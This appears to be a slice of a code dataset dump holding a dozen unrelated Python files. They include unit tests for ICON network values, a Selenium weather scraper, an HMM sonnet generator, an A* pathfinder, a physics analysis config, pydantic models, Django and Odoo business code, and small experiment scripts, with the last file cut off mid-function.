index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
998,100 | 6c04350a6741a594e2c05972af8a5bc262792336 | # -*- coding: utf-8 -*-
# Copyright 2019 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from random import random
import pytest
from iconservice.inv.data.value import *
from tests import create_address
class TestValue:
    """Tests for the ICON network Value subclasses.

    Covers the make_key/to_bytes/from_bytes serialization round-trip and
    the constructor validation of each concrete Value type.
    """
    def _modify_if_collection_type(self, value: Any):
        # Recursively mutate a list/dict argument in place (adding a dummy
        # element) so a test can prove that Value.value returns a copy rather
        # than aliasing the instance's internal state.
        if isinstance(value, list):
            value.append("dump")
            for val in value:
                if isinstance(val, (list, dict)):
                    self._modify_if_collection_type(val)
        elif isinstance(value, dict):
            value["dump_key"] = "dump_value"
            for val in value.values():
                if isinstance(val, (list, dict)):
                    self._modify_if_collection_type(val)
    @pytest.mark.parametrize("icon_network_value, value", [
        (RevisionCode(5), 5),
        (RevisionName("1.1.5"), "1.1.5"),
        (ScoreBlackList([]), []),
        (StepPrice(10_000), 10_000),
        (StepCosts({StepType('default'): 10_000}), {StepType('default'): 10_000}),
        (MaxStepLimits({
            IconScoreContextType.INVOKE: 100_000_000,
            IconScoreContextType.QUERY: 100_000_000
        }), {
            IconScoreContextType.INVOKE: 100_000_000,
            IconScoreContextType.QUERY: 100_000_000
        }),
        (ServiceConfig(5), 5),
        (ImportWhiteList({"iconservice": ['*'], "os": ["path"]}), {"iconservice": ['*'], "os": ["path"]})
    ])
    def test_from_to_bytes(self, icon_network_value: 'Value', value):
        """Round-trip each Value subclass through key/bytes serialization."""
        # TEST: Check key is generated as expected (b'inv' prefix + type tag)
        expected_bytes_key = b'inv' + icon_network_value.TYPE.value
        bytes_key: bytes = icon_network_value.make_key()
        assert bytes_key == expected_bytes_key
        # TEST: encoded_value should include the version information and encoded by msgpack
        encoded_value: bytes = icon_network_value.to_bytes()
        unpacked_value: list = MsgPackForDB.loads(encoded_value)
        expected_version = 0
        assert len(unpacked_value) == 2
        assert unpacked_value[0] == expected_version
        # TEST: decoded value has same value with original
        decoded_value: 'Value' = icon_network_value.from_bytes(encoded_value)
        assert decoded_value.value == icon_network_value.value
        # TEST: returned value property should not effect on Value instances' value when being modified
        returned_value: Any = icon_network_value.value
        # Act: mutate the returned collection in place; the instance's value
        # must remain equal to the original input.
        self._modify_if_collection_type(returned_value)
        assert value == icon_network_value.value
    # Below tests each Value's initialization
    @pytest.mark.parametrize("value", [
        {
            type_: random() for type_ in StepType
        },
        {
            StepType('delete'): -150
        },
        {
            StepType('contractDestruct'): -100,
        }
    ])
    def test_step_costs_initialization(self, value):
        """StepCosts accepts a costs dict and stores it unchanged."""
        step_costs: 'StepCosts' = StepCosts(value)
        assert step_costs.value == value
    @pytest.mark.parametrize("value", [{type_: -1} for type_ in StepType if
                                       type_ != StepType.CONTRACT_DESTRUCT and type_ != StepType.DELETE])
    def test_step_costs_should_raise_exception_when_setting_minus_costs(self, value):
        """Negative costs are rejected for every step type except the two refund types."""
        with pytest.raises(InvalidParamsException) as e:
            _: 'StepCosts' = StepCosts(value)
        assert e.value.message.startswith("Invalid step costs:")
    @pytest.mark.parametrize("value", [["list"], "str", 1, True, ("1", "2"), 0.1, b'bytes'])
    def test_step_costs_should_raise_exception_when_input_invalid_type_value(self, value):
        """Non-dict inputs to StepCosts raise TypeError."""
        with pytest.raises(TypeError) as e:
            _: 'StepCosts' = StepCosts(value)
        assert e.value.args[0].startswith("Invalid Step costs type:")
    @pytest.mark.parametrize("value", [{"dict": 1}, ["list"], "str", ("1", "2"), 0.1, -1, b'bytes'])
    def test_step_price_should_raise_exception_when_input_invalid_value(self, value):
        """StepPrice rejects non-int and negative inputs."""
        with pytest.raises(BaseException):
            _: 'StepPrice' = StepPrice(value)
    @pytest.mark.parametrize("value", [
        {IconScoreContextType.INVOKE: -1, IconScoreContextType.QUERY: 0},
        {IconScoreContextType.INVOKE: 0, IconScoreContextType.QUERY: -1},
        ["list"], "str", True, ("1", "2"), 0.1, -1, b'bytes'
    ])
    def test_max_step_limits_should_raise_exception_when_input_invalid_value(self, value):
        """MaxStepLimits rejects negative limits and non-dict inputs."""
        with pytest.raises(BaseException):
            _: 'MaxStepLimits' = MaxStepLimits(value)
    @pytest.mark.parametrize("value, expected_invoke, expected_query", [
        ({}, 0, 0),
        ({IconScoreContextType.INVOKE: 1}, 1, 0),
        ({IconScoreContextType.QUERY: 1}, 0, 1)
    ])
    def test_max_step_limits_should_supplement_value(self, value, expected_invoke, expected_query):
        """Missing context-type keys are filled in with a default of 0."""
        max_step_limits: 'MaxStepLimits' = MaxStepLimits(value)
        assert max_step_limits.value[IconScoreContextType.INVOKE] == expected_invoke
        assert max_step_limits.value[IconScoreContextType.QUERY] == expected_query
    @pytest.mark.parametrize("value", [
        [1],
        [b'bytes'],
        ["str"],
        [create_address(), "str"],
        {"dict": "value"}, "str", True, ("1", "2"), 0.1, -1, b'bytes'
    ])
    def test_score_black_list_should_raise_exception_when_input_invalid_value(self, value):
        """ScoreBlackList requires a list of Address instances only."""
        with pytest.raises(BaseException):
            _: 'ScoreBlackList' = ScoreBlackList(value)
    @pytest.mark.parametrize("value", [
        {1: ["path"]},
        {b'bytes': ["path"]},
        {"key": [1]},
        {"key": {"dict": "value"}},
        {"key": ("1", "2")},
        {"key": ("1", "2")},
        {"dict": "value"},
        {"dict": 1},
        {"dict": b'bytes'},
        {"dict": True},
        "str", True, ("1", "2"), 0.1, -1, b'bytes'
    ])
    def test_import_white_list_should_raise_exception_when_input_invalid_value(self, value):
        """ImportWhiteList requires a dict of str keys mapping to lists of str."""
        # NOTE(review): {"key": ("1", "2")} appears twice in the params above.
        with pytest.raises(BaseException):
            _: 'ImportWhiteList' = ImportWhiteList(value)
    @pytest.mark.parametrize("value", [
        -1,
        sum(IconServiceFlag) + 1,
        {"dict": True}, "str", ("1", "2"), b'bytes'
    ])
    def test_service_config_should_raise_exception_when_input_invalid_value(self, value):
        """ServiceConfig rejects values outside the valid flag bitmask range."""
        with pytest.raises(BaseException):
            _: 'ServiceConfig' = ServiceConfig(value)
|
998,101 | 348fcd3f0350f21fd10f946e1b0d7136e42e4b48 | from scrapy import Spider
from scrapy.selector import Selector
from get_weather.items import GetWeatherItem
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class CrawlerSpider(Spider):
    """Scrapes the hourly observation table from wunderground.com history pages.

    Uses Selenium (Firefox) because the table is rendered client-side by
    Angular, so plain Scrapy only ever sees the empty page shell.
    """
    name = "crawler"
    allowed_domains = [
        "www.wunderground.com"]

    def __init__(self, url, *args, **kwargs):
        # Start the browser first so parse() can rely on self.driver.
        self.driver = webdriver.Firefox()
        super(CrawlerSpider, self).__init__(*args, **kwargs)
        self.start_urls = [f'{url}']

    @staticmethod
    def _or_nodata(value):
        """Return *value* unchanged, or the literal "NoData" if it is empty."""
        return value if value != '' else "NoData"

    def parse(self, response):
        """Render the page in Selenium, then yield one item per table row."""
        self.driver.implicitly_wait(60)
        self.driver.get(response.url)
        # Result deliberately discarded: combined with the implicit wait this
        # blocks until the Angular-rendered table exists in the DOM.
        self.driver.find_elements(
            By.XPATH, '//table[@class="mat-table cdk-table mat-sort ng-star-inserted"]')
        html = self.driver.page_source
        body = Selector(text=html)
        table = body.xpath(
            '//*[@class="observation-table ng-star-inserted"]/table[@class="mat-table cdk-table mat-sort ng-star-inserted"]/tbody/tr')
        for row in table:
            # Query each row once instead of re-running the same XPath per field.
            spans = row.xpath('td/span/text()')
            units = row.xpath('td/lib-display-unit/span/span/text()')
            Time = spans[0].extract()
            Temperature = units[0].extract()
            Dew_Point = units[1].extract()
            Humidity = units[2].extract()
            # Rows with only two plain spans have no Wind cell: the second
            # span is already the Condition.
            check = spans.extract()
            if (len(check) == 2):
                Wind = ""
                Condition = spans[1].extract()
            else:
                Wind = spans[1].extract()
                Condition = spans[2].extract()
            Wind_Speed = units[3].extract()
            Wind_Gust = units[4].extract()
            Pressure = units[5].extract()
            Precip = units[6].extract()

            # Normalize empty cells to "NoData" and populate the item.
            item = GetWeatherItem()
            item['Time'] = self._or_nodata(Time)
            item['Temperature'] = self._or_nodata(Temperature)
            item['Dew_Point'] = self._or_nodata(Dew_Point)
            item['Humidity'] = self._or_nodata(Humidity)
            item['Wind'] = self._or_nodata(Wind)
            item['Wind_Speed'] = self._or_nodata(Wind_Speed)
            item['Wind_Gust'] = self._or_nodata(Wind_Gust)
            item['Pressure'] = self._or_nodata(Pressure)
            item['Precip'] = self._or_nodata(Precip)
            item['Condition'] = self._or_nodata(Condition)
            yield item
        self.driver.close()
|
998,102 | dfe95e5ecb3d46313d55d7bfa9092e563ea1e020 | from compute_ghcm_mdt_one_user import compute_ghcm_mdt_one_user as cgou
# Run the GHCM-MDT computation for argument 4 — presumably a user index;
# confirm against compute_ghcm_mdt_one_user's signature.
cgou(4) |
998,103 | d02154b27da930bcdac29cf5b093577ccd1c3b53 | from HMM_helper import *
from HMM import *
from makeRhymeDic import getRhymeDicShakes
import random
import numpy as np

# Parse the corpus into an observation sequence and word-index map.
# FIX: files are now opened via `with` so the handles are always closed,
# even if parsing or writing raises.
with open('data/shakespeare.txt') as f:
    obs, obs_map = parse_observations(f.read())
X = obs
# Load the pre-trained transition (A) and emission (O) matrices.
A = np.loadtxt('HMM_A.txt')
O = np.loadtxt('HMM_O.txt')
# Create the model
HMM = HiddenMarkovModel(A, O)
# Generate 7 rhyming couplets (14 lines -> one sonnet).
couplets = []
for i in range(7):
    couplets.append(sample_shakes_couplet(HMM, obs_map, 10))
# Write the sonnet in ABAB CDCD EFEF GG order: three quatrains built by
# interleaving couplet pairs, then the 7th couplet as the closing GG.
with open("generated_poems/shakespeare_sonnet.txt", "w") as f:
    for i in range(3):
        f.write(couplets[2 * i][0])
        f.write(couplets[2 * i + 1][0])
        f.write(couplets[2 * i][1])
        f.write(couplets[2 * i + 1][1])
    f.write(couplets[6][0])
    f.write(couplets[6][1])
visualize_sparsities(HMM)
states_to_wordclouds(HMM, obs_map)
|
998,104 | 09e92db174c24f1bcb49b24af31470604cc389da | import heapq
from options import Options
from tile import Tile
from drop import Drop
class AStar:
    """A* search that builds a zombie's path toward a survivor's tile.

    Construction only performs setup; call solve() to run the search and
    populate zombie.path / the zombie's next target.
    """
    NSEW = -Options.tiles_x, Options.tiles_x, 1, -1 # Add to find tile in a direction
    def __init__(self, zombie, survivor):
        for tile in Tile.opens: # Reset from last search
            tile.parent = None
            tile.h, tile.f, tile.g = 0, 0, 0
        zombie.path = []
        self.open = []
        heapq.heapify(self.open)
        self.closed = set()
        self.zombie = zombie
        self.start = zombie.get_tile()
        self.end = survivor.get_tile()
        # While the "trans" drop is active, retarget to the nearest open tile
        # instead of the survivor's own tile.
        if "trans" in Drop.actives:
            self.end = self.end.closest_open_tile()
        if self.end is self.start:
            self.solve = lambda *_: None # overwrite solve and make the zombie stay
        # Heap entries are (f, tile) tuples ordered by f-score.
        heapq.heappush(self.open, (self.start.f, self.start))
    def get_neighbours(self, cell):
        # Yield walkable, not-yet-closed, on-screen tiles in the four cardinal
        # directions; the grid is a flat list, hence the index arithmetic.
        for cardinal, offset in enumerate(AStar.NSEW):
            sur_tile_num = cell.number + offset
            try:
                sur_tile = Tile.instances[sur_tile_num]
            except IndexError:
                continue
            if (sur_tile.walkable and sur_tile not in self.closed and
                Tile.on_screen(cardinal, sur_tile_num)):
                yield sur_tile
    def get_heuristic(self, cell):
        """:return the Manhattan distance between end and cell
        https://en.wikipedia.org/wiki/Taxicab_geometry"""
        return 10 * (self.end.pos - cell.pos).manhattan_dist() / Tile.length
    def update_cell(self, neighbour, cell):
        # Re-score `neighbour` as reached via `cell` (uniform move cost of 10).
        neighbour.g = cell.g + 10
        neighbour.h = self.get_heuristic(neighbour)
        neighbour.f = neighbour.h + neighbour.g
        neighbour.parent = cell
    def solve(self):
        # Expand the lowest-f tile until the goal is closed or the frontier
        # is exhausted, then walk parent links back to build the path.
        while self.open and self.end not in self.closed:
            f, cell = heapq.heappop(self.open)
            assert cell.walkable
            self.closed.add(cell)
            neighbours = self.get_neighbours(cell)
            for neighbour in neighbours:
                # NOTE(review): this membership test is a linear scan against
                # the (f, tile) heap entries, and an entry re-scored by
                # update_cell() is not re-ordered within the heap — confirm
                # this approximation is acceptable for the game's grid sizes.
                if (neighbour.f, neighbour) in self.open:
                    if neighbour.g > cell.g + 10:
                        self.update_cell(neighbour, cell)
                else:
                    self.update_cell(neighbour, cell)
                    heapq.heappush(self.open, (neighbour.f, neighbour))
        # Path is appended in goal->start order; the final `child` is the tile
        # adjacent to the start, which becomes the zombie's immediate target.
        parent = self.end
        while not (parent is None or parent is self.start):
            child = parent
            parent = parent.parent
            self.zombie.path.append(child)
        # NOTE(review): if the loop above never runs, `child` is unbound here;
        # in practice the start==end case is short-circuited in __init__.
        self.zombie.set_target(child)
# Running the module directly executes any doctests in this file.
if __name__ == "__main__":
    import doctest
    doctest.testmod()
|
998,105 | 4db2157789ca6feab0754681966c1433aedf8193 | import FWCore.ParameterSet.Config as cms
# CMSSW configuration for the "MyAnal" HCAL timing analysis process:
# runs an L1 jet-trigger filter over CRAFT cosmics RECO data and writes both
# a TFileService histogram file and a filtered pool output file.
process = cms.Process("MyAnal")
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("RecoJets.Configuration.CaloTowersES_cfi")
process.load("FWCore.MessageService.MessageLogger_cfi")
# -1 = process every event in the input files.
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source("PoolSource",
    # replace 'myfile.root' with the source file you want to use
    fileNames = cms.untracked.vstring(
        #'/store/data/Commissioning08/Cosmics/RECO/CRAFT_ALL_V9_225-v2/0002/CA3CF466-E7F9-DD11-AF70-003048679006.root'
        #'/store/data/Commissioning08/Cosmics/RAW-RECO/CRAFT_ALL_V9_TrackingPointing_225-v3/0006/E45FEB6E-A0FF-DD11-B5ED-00304867C0FC.root'
        '/store/data/Commissioning08/Cosmics/RECO/CRAFT_ALL_V9_225-v2/0002/1AC595AF-BFFA-DD11-A899-0030486792B6.root'
    )
)
process.TFileService = cms.Service("TFileService",
    closeFileFast = cms.untracked.bool(True),
    fileName = cms.string('hcalanal-jettrig.root')
)
process.load("MyEDmodules.HcalTimingAnalyzer.hcalFilteredReco4CRAFT_cff")
#-----------------------------
# Hcal Conditions: from Global Conditions Tag
#-----------------------------
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.connect = 'frontier://Frontier/CMS_COND_21X_GLOBALTAG'
process.GlobalTag.globaltag = 'CRAFT_V4P::All' # or any other appropriate
process.prefer("GlobalTag")
# L1 GT EventSetup
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.startup.L1Menu_startup2_v2_Unprescaled_cff")
process.load("L1Trigger.Skimmer.l1Filter_cfi")
# Select events passing the single-jet L1 trigger bit (alternatives kept below).
#process.l1Filter.algorithms = cms.vstring("L1_SingleMuOpen")
#process.l1Filter.algorithms = cms.vstring("L1_SingleEG5_00001")
process.l1Filter.algorithms = cms.vstring("L1_SingleJet10_0001")
#process.p = cms.Path(process.l1Filter*process.hcalDigis*process.myan)
process.p = cms.Path(process.l1Filter*process.allfilts)
# Keep only analysis products and HCAL rechit/tower collections for events
# that passed path 'p'.
process.out = cms.OutputModule("PoolOutputModule",
    SelectEvents = cms.untracked.PSet(
        SelectEvents = cms.vstring('p')
    ),
    outputCommands = cms.untracked.vstring(
        "drop *",
        "keep *_*_*_MyAnal",
        "keep recoCaloMETs_*_*_*",
        "keep *_hbhereco_*_*",
        "keep *_hfreco_*_*",
        "keep *_horeco_*_*",
        "keep *_towerMaker_*_*"
    ),
    fileName = cms.untracked.string('hcaltimeanal-jettrig-pool.root')
)
process.o = cms.EndPath(process.out)
|
998,106 | 483807fc64e55f4a625bf21922aed528b2747954 | # This example sets a weight of 1.0 for all clones of the active Cloner object
import c4d
from c4d.modules import mograph
def main():
    """Assign a weight of 1.0 to every clone of the active Cloner object.

    `op` is the active object, predefined by the Cinema 4D script context.
    """
    cloner = op
    # Only act on an active object that really is a Cloner (type id 1018544).
    if cloner is not None and cloner.GetType() == 1018544:
        clone_count = cloner[c4d.MG_LINEAR_COUNT]
        mograph.GeSetMoDataWeights(cloner, [1.0] * clone_count)
        c4d.EventAdd()


if __name__ == '__main__':
    main()
|
998,107 | 07acf84f656095b9926e4d276f99d5b480c8b50a | from pyo import *
import math
import time
import os
import glob
import load
# Boot the pyo audio server: 44.1 kHz, output-only (duplex=0).
s=Server(sr=44100,duplex=0).boot()
# NOTE(review): dead assignment — overwritten two lines below; keep only one.
name = "nessaAllTrim.wav"
path = "../samples"
name="BD TI.wav"
infile = os.path.join(path, name)
print "current file is: " + infile
# Load the sample into a table; TrigEnv replays it (linear interp) on trigger.
table = SndTable(path=infile)
dur = table.getDur()
trig=Trig().stop()
osc=TrigEnv(trig,table, dur, interp=2, mul=1 ).out()
stress=load.StressMonitor()
# Poll the stress monitor once per second via the metronome callback.
metro=Metro(1).play()
def doit():
    print stress.doit()
trigFunc=TrigFunc(metro,doit)
s.gui(locals())
|
998,108 | 9c5e3939732ede0863d130bd48960fe3ccb350c0 | from enum import Enum
from typing import List, Optional
from pydantic import BaseModel, Field, PositiveInt, validator
class MaritalStatus(str, Enum):
    # str mixin so members serialize/compare as plain strings.
    single = "single"
    married = "married"
class OwnershipStatus(str, Enum):
    # str mixin so members serialize/compare as plain strings.
    mortgaged = "mortgaged"
    owned = "owned"
class House(BaseModel):
    # Whether the applicant's house is owned outright or mortgaged.
    ownership_status: OwnershipStatus
class Vehicle(BaseModel):
    # Vehicle model year; must be a positive integer.
    year: PositiveInt
class UserProfile(BaseModel):
    """Immutable risk-assessment profile for an insurance applicant."""
    age: int = Field(ge=0)
    dependents: int = Field(ge=0)
    income: int = Field(ge=0)
    marital_status: MaritalStatus
    # NOTE(review): bare `List` performs no element coercion; the validator
    # below enforces the three-answers-of-0-or-1 contract. Annotating as
    # List[int] would change pydantic's runtime coercion, so it is left as-is.
    risk_questions: List
    house: Optional[House]
    vehicle: Optional[Vehicle]
    class Config:
        # Freeze instances after construction (pydantic v1 style).
        allow_mutation = False
    @validator("risk_questions")
    def questions_must_be_zero_or_one(cls, answers: List) -> List:
        """Require exactly three answers, each either 0 or 1."""
        if len(answers) != 3:
            raise ValueError("risk answers length should be 3")
        for ans in answers:
            if ans not in [0, 1]:
                raise ValueError("risk answers must be 0 or 1")
        return answers
|
998,109 | 87c5deec30c62992f15680911f37f76d6d7fc026 | import numpy as np
import pandas as pd
from gradientDescend_oops import lm,logit
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels.api as sm
import statsmodels.discrete.discrete_model as smd
#from gradientDescend import logit
###################### reading data #######################################
df=pd.read_csv(r".\energydata_complete.csv")
df.date=pd.to_datetime(df.date)
y=df["Appliances"]
x=df[['T1','T2','T3','T4','T5','T6']]
# 70/30 train/test split with a fixed seed for reproducibility.
np.random.seed(100)
split = np.random.uniform(size=x.shape[0]) < 0.7
X_train= x[split]
y_train= y[split]
X_test= x[~split]
y_test= y[~split]
# Standardize using *training* statistics only (no test leakage).
x_train_mean = X_train.mean(axis=0)
x_train_std = X_train.std(axis=0)
X_train_norm = (X_train-x_train_mean)/x_train_std
X_test_norm = (X_test-x_train_mean)/x_train_std
# Binary target: above/below the training median (note: test labels also use
# the training median on purpose).
y_train_class = np.where(y_train>np.median(y_train),1,0)
y_test_class = np.where(y_test>np.median(y_train),1,0)
# --- Sweep learning rates for the linear model -----------------------------
train_hist = []
test_hist = []
cost_iter_hist = []
alphas = 10**(np.arange(-5,0,0.5))
for alpha in alphas:
    model = lm(verbose=False, maxiter=100000, alpha=alpha, restart=1, tol=1e-8)
    finalb, finalW, cost_hist = model.fit(X_train_norm, np.log(y_train))
    (_,train_cost),(_,test_cost) = model.predict(X_test_norm,np.log(y_test))
    cost_iter_hist += [cost_hist]
    train_hist += [train_cost]
    test_hist += [test_cost]
plt.plot(np.log10(alphas), train_hist)
plt.plot(np.log10(alphas), test_hist)
for i in cost_iter_hist:
    plt.plot(len(i))
# --- Sweep convergence tolerances ------------------------------------------
train_hist = []
test_hist = []
tols = 10**(np.arange(-12,2,0.5))
for tol in tols:
    model = lm(verbose=False, maxiter=100000, alpha=0.001, restart=1, tol=tol)
    finalb, finalW, cost_hist = model.fit(X_train_norm, np.log(y_train))
    (_,train_cost),(_,test_cost) = model.predict(X_test_norm,np.log(y_test))
    train_hist += [train_cost]
    test_hist += [test_cost]
plt.plot(np.log10(tols), train_hist)
plt.plot(np.log10(tols), test_hist)
# --- Logistic regression ----------------------------------------------------
# FIX: the original read `alpha =0.q`, a syntax error that prevented the whole
# file from parsing. 0.1 is assumed here — confirm the intended learning rate.
model = logit(verbose=False, maxiter=100000, alpha=0.1, restart=1, tol=1e-8)
finalb, finalW, cost_hist = model.fit(X_train_norm, y_train_class)
model.predict(X_test_norm,y_test_class)
cost_hist[-1]
a=[]
c=[]
# NOTE(review): the legacy sweep below referenced an undefined name (`x_norm`)
# and an older lm(X=..., Y=...) API, so it always raised NameError; it is
# preserved commented-out pending confirmation of intent.
# for alpha in np.log10(np.logspace(10,1,10)):
#     beta, mincost = lm(X=x_norm, Y=y, verbose=False, maxiter=10000, alpha =alpha, restart=1)
#     a+=[alpha]
#     c+=[mincost]
#     print('{0:0.2f} --> {1:0.2f}'.format(alpha, mincost))
plt.plot(cost_hist)
plt.plot(a, c, 'o')
##################### Comparing with Statmodel #############################
df.describe()
import statsmodels.api as sm
import statsmodels.discrete.discrete_model as smd
mod = sm.OLS(np.log(y_train), X_train_norm)
res = mod.fit()
res.summary()
mod1=smd.Logit(y_train_class, X_train_norm).fit()
mod1.summary()
import seaborn as sns
sns.distplot(np.log(y))
|
998,110 | 0351908ef3dc33f70df8fc4fc33c9a1d9e5df8d1 |
from django.shortcuts import render, get_object_or_404
from restful import restful
from ..models import Cat
from ..forms import CatModelForm
from django.http import HttpResponseRedirect
from django.urls import reverse
import sys
@restful
def edit(request, cat):
    """Render the edit form for *cat* (GET handler).

    POST submissions are handled by the @edit.method('POST') function below.
    """
    # FIX: the original POST branch referenced an undefined name (`id_cat`)
    # and always raised NameError; POST routing is done by the decorator, so
    # the dead branch is removed here.
    form = CatModelForm(instance=cat)
    return render(request, 'cat/cat_edit.html', locals())
@edit.method('POST')
def edit(request, id_cat):
    """Handle the edit-form submission for the Cat with primary key *id_cat*.

    Requires an authenticated user who is a superuser or holds the
    'cat.change_cat' permission; otherwise redirects to the index.
    """
    # FIX: the authentication check was inverted (it redirected *authenticated*
    # users away) and `request.user.user.is_superuser` had a spurious extra
    # `.user` attribute that raised AttributeError.
    if not request.user.is_authenticated:
        return HttpResponseRedirect(reverse('cat:index'))
    if not request.user.is_superuser:
        if not request.user.has_perm('cat.change_cat'):
            return HttpResponseRedirect(reverse('cat:index'))
    raw_data = dict()
    raw_data.update( request.POST )
    cat = get_object_or_404(Cat, pk=id_cat)
    form = CatModelForm(request.POST, instance=cat)
    if form.is_valid():
        form.save()
        return render(request, 'cat/cat_edit.html', locals())
    else:
        return render(request, 'cat/cat_edit.html', locals())
|
998,111 | 51b279f08c59f7e055cca2cef4308bdf3d76594a | """
===== LIGHT SEQUENCE RUNNER v.1.0b =====
Copyright (C) 2019 - 2020 IU7Games Team.
Runs a player's 7EQUEENCEGAME strategy to check for the absence of
segmentation faults, infinite loops, and similar hard failures.
"""
import os
from games.sequence.sequence_runner import start_sequence_game
def light_sequence_runner(player_lib_path):
    """Smoke-test a player's strategy library on sample inputs.

    Runs the strategy once so crashes (segfaults, hangs) surface before
    real matches; prints a green OK marker on success.
    """
    players = [player_lib_path]
    start_sequence_game(players)
    print("\033[0;32mSEQUENCE GAME: OKAY\033[0m")


if __name__ == "__main__":
    light_sequence_runner(
        f"/sandbox/{os.environ['GITLAB_USER_LOGIN']}_7equeence_lib.so")
|
998,112 | 0a313d58805d64820850beadce26c07972e4579e | from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools import amount_to_text_en, float_round
import odoo.addons.decimal_precision as dp
#==================================================
# Class : BiJournalVoucher
# Description : Account Receipt Details
#==================================================
class BiJournalVoucher(models.Model):
    """Journal voucher: a manual multi-line entry with a draft/post/cancel
    workflow that materializes into an account.move when posted."""
    _name = "bi.journal.voucher"
    _description = "Journal Voucher Details"

    @api.multi
    def _get_default_journal(self):
        # Default to the first journal of type 'general'.
        return self.env['account.journal'].search([('type', '=', 'general')], limit=1).id

    # FIX: was `Index= True` — a miscapitalized keyword Odoo ignores, so the
    # column was never indexed; the correct attribute is `index=True`.
    name = fields.Char(string="Sequence No", required=True, index=True, default=lambda self:('New'), readonly=True, states={'draft': [('readonly',False)]})
    receipt_date = fields.Date(string="Voucher Date", default=fields.Date.context_today, required=True, readonly=True, states={'draft': [('readonly',False)]})
    customer = fields.Many2one('res.partner', string = "Customer", readonly=True, states={'draft': [('readonly',False)]})
    journal_id = fields.Many2one('account.journal',string="Journal ID", required=True, readonly=True, states={'draft': [('readonly',False)]}, default=_get_default_journal, domain=[('type', '=', 'general')])
    account_id = fields.Many2one('account.account',string="Account ID", readonly=True, states={'draft': [('readonly',False)]})
    narration = fields.Text(string="Narration")
    receipt_ids = fields.One2many('bi.journal.voucher.line','receipt_id',string="Accounts",readonly=True, states={'draft': [('readonly', False)]})
    user_id = fields.Many2one('res.users',string='Username',default=lambda self: self.env.user)
    move_id = fields.Many2one('account.move', string='Journal Entry',readonly=True, index=True, ondelete='restrict', copy=False,
        help = "Link to the automatically generated Journal Items.")
    state = fields.Selection([
        ('draft', 'Draft'),
        ('post', 'Posted'),
        ('cancel', 'Cancelled'),
        ], string='Status', readonly=True, copy=False, index=True, track_visibility='onchange', default='draft')
    company_id = fields.Many2one('res.company', 'Company', default=lambda self: self.env['res.company']._company_default_get('sale.order'), states={'post': [('readonly',True)]})
    currency_id = fields.Many2one('res.currency', string='Currency',default=lambda self: self.env.user.company_id.currency_id,readonly=True, states={'draft': [('readonly', False)]})
    bank_type = fields.Selection([('cheque','Cheque'),('ntfs','NTFS'),('cash','Cash'),('others','Others')],string="Payment Type",readonly=True, states={'draft': [('readonly', False)]})
    cheque_no = fields.Char("Cheque Number")
    # NOTE(review): capitalized field name kept for backward compatibility with
    # existing views/DB column — renaming would break callers.
    Cheque_date = fields.Date("Cheque Date")
    vendor_invoice = fields.Char(string="Vendor Invoice" , store=True)
    school_id = fields.Many2one('school.school', 'Campus')
    _sql_constraints = [
        ('vendor_invoice', 'unique( vendor_invoice )', 'Vendor Invoice must be unique.') ]

    @api.multi
    def button_post(self):
        """Create one journal entry per voucher from its lines, post it, and
        move the voucher to the 'post' state."""
        aml_dict = {}
        aml_obj = self.env['account.move.line'].with_context(check_move_validity=False)
        for receipt in self:
            dst_move = self.env['account.move'].create({
                'date': receipt.receipt_date,
                'ref':('Receipt'+' - '+str(receipt.vendor_invoice)),
                'company_id': receipt.company_id.id,
                'journal_id':receipt.journal_id.id,
                'school_id':receipt.school_id.id,
                })
            company_currency = receipt.company_id.currency_id
            for line in receipt.receipt_ids:
                if line.credit_amount>0:
                    debit, credit, amount_currency, currency_id = aml_obj.with_context(date=self.receipt_date).compute_amount_fields(line.credit_amount, self.currency_id, self.company_id.currency_id, company_currency)
                    # FIX: the original dict listed 'currency_id' twice; only
                    # the computed value (last duplicate) ever took effect, so
                    # the dead first key is removed. Unused `i=1` dropped too.
                    aml_dict={
                        'name':(receipt.cheque_no and '-'+str(receipt.cheque_no) or '')+'-'+(line.name and str(line.name) or ''),
                        'account_id': line.account_id.id,
                        'currency_id': currency_id and currency_id or False,
                        'journal_id': receipt.journal_id.id,
                        'debit':0.0,
                        'analytic_account_id':line.analytic_account_id and line.analytic_account_id.id or False,
                        'credit':debit,
                        'partner_id':line.partner_id.id,
                        'move_id':dst_move.id,
                        'amount_currency': amount_currency and amount_currency*-1 or 0.0,
                        }
                    aml_obj.create(aml_dict)
                if line.debit_amount>0:
                    debit, credit, amount_currency, currency_id = aml_obj.with_context(date=self.receipt_date).compute_amount_fields(line.debit_amount, self.currency_id, self.company_id.currency_id, company_currency)
                    aml_dict.update({
                        'name': (receipt.cheque_no and '-'+str(receipt.cheque_no) or '')+'-'+(line.name and str(line.name) or ''),
                        'account_id': line.account_id.id,
                        'currency_id': currency_id and currency_id or False,
                        'journal_id': receipt.journal_id.id,
                        'credit':0.0,
                        'debit':debit,
                        'analytic_account_id':False,
                        'partner_id':line.partner_id.id,
                        'move_id':dst_move.id,
                        'amount_currency': amount_currency and amount_currency or 0.0,
                        })
                    aml_obj.create(aml_dict)
            dst_move.post()
            receipt.write({'state':'post','move_id':dst_move.id,'name':dst_move.name})

    @api.multi
    def button_cancel(self):
        """Cancel and delete the generated journal entry, then mark cancelled."""
        if self.move_id:
            self.move_id.button_cancel()
        move_id = self.move_id
        self.write({'state': 'cancel','move_id' : False})
        move_id.unlink()

    @api.multi
    def button_draft(self):
        """Reset the voucher back to the editable draft state."""
        self.write({'state': 'draft'})

    @api.multi
    def unlink(self):
        # Only draft vouchers may be deleted.
        for order in self:
